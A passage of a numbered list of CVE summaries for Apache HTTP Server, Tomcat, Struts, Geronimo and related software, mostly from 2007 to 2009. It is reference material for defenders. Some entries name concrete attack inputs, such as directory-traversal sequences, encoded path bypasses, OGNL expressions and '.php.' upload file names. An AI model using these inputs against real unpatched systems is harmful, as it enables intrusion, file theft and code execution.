| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
5752| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
5753| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
5754| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
5755| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
5756| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
5757| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
5758| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
5759| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
5760| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
5761| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
5762| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
5763| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
5764| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
5765| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
5766| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
5767| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
5768| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
5769| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
5770| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
5771| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
5772| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
5773| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
5774| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
5775| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
5776| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
5777| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
5778| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
5779| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
5780| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
5781| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
5782| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
5783| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
5784| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
5785| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
5786| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
5787| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
5788| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
5789| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
5790| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
5791| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
5792| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
5793| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
5794| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
5795| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
5796| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
5797| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
5798| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
5799| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
5800| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
5801| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
5802| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
5803| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
5804| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
5805| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers to bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
5806| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
5807| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
5808| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
5809| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
5810| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
5811| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
5812| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
5813| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
5814| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
5815| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
5816| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
5817| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
5818| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
5819| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
5820| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
5821| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
5822| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
5823| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
5824| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
5825| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
5826| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
5827| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
5828| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
5829| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
5830| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
5831| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
5832| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5833| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
5834| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
5835| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
5836| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
5837| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
5838| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
5839| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
5840| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
5841| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
5842| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
5843| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
5844| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
5845| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
5846| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5847| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
5848| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
5849| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
5850| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
5851| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
5852| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
5853| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
5854| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
5855| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
